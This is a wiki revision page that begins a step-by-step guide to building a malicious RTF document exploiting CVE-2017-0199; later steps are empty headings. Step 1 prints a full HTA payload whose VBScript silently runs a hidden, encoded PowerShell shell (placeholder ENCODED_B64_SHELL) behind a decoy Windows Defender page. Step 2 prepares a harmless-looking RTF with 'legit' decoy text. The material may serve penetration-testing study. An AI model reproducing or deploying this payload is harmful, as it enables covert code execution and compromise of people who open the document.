CVE-2017-0199 Malicious RTF Document: Difference between revisions
From ICO wiki
Jump to navigationJump to search
Created page with "==CVE-2017-0199 Malicious RTF Document== ===Step 1 === Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta" <pre> <..." |
|||
| Line 33: | Line 33: | ||
</pre> | </pre> | ||
===Step 2 === | ===Step 2 === | ||
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content") | |||
Call it "ms.rtf" | |||
===Step 3 === | ===Step 3 === | ||
===Step 4 === | ===Step 4 === | ||
===Step 5 === | ===Step 5 === | ||
===Step 6 === | ===Step 6 === | ||
Revision as of 20:33, 2 May 2017
CVE-2017-0199 Malicious RTF Document
Step 1
Prepare an HTA file: (HTA file are HTML application which can run JScript and VBscript) Let's call it "ms.hta"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<title>Bonjour</title>
<script language="VBScript">
Set owFrClN0giJ = CreateObject("Wscript.Shell")
Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")
If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then
owFrClN0giJ.Run "powershell.exe -nop -w hidden -e ENCODED_B64_SHELL"
End If
</script>
<hta:application
id="oHTA"
applicationname="Bonjour"
application="yes"
>
</hta:application>
</head>
<div>
<object type="text/html" data="http://windows.microsoft.com/en-IN/windows7/products/features/windows-defender" width="100%" height="100%">
</object></div>
<body>
</body>
</html>
Step 2
Create a simple RTF document using Winword with the any random content. (in our example the string "This is my official and legit content")
Call it "ms.rtf"
